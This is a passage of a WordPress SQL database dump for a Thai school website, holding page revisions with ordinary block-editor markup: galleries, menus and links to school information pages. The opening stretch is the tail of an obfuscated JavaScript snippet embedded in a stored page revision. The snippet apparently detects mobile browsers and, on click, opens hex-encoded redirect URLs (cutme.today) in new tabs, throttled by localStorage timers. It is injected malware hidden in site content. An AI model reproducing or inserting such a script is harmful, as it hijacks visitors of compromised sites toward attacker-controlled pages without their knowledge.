)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-29 12:36:41','2025-07-29 05:36:41','',14,'http://pakhaeng.ssk.in.th/?p=1910',0,'revision','',0),
(1912,1,'2025-08-05 13:23:11','2025-08-05 06:23:11','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[1904],\"type\":\"grid\",\"imageRatio\":\"land169\",\"linkTo\":\"custom\",\"captionStyles\":[{\"size\":[\"\",\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":6,\"textTransform\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"background\":\"#000000\",\"backgroundOpacity\":0.5}],\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":1904,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=1904\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr-1.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbyztUtl8EM-IiB9-zUQiX6uZlpuS1009A7GnLyQYTDE88aCpW5lZ-fTDR-YT54UB2_i/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr-1.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a 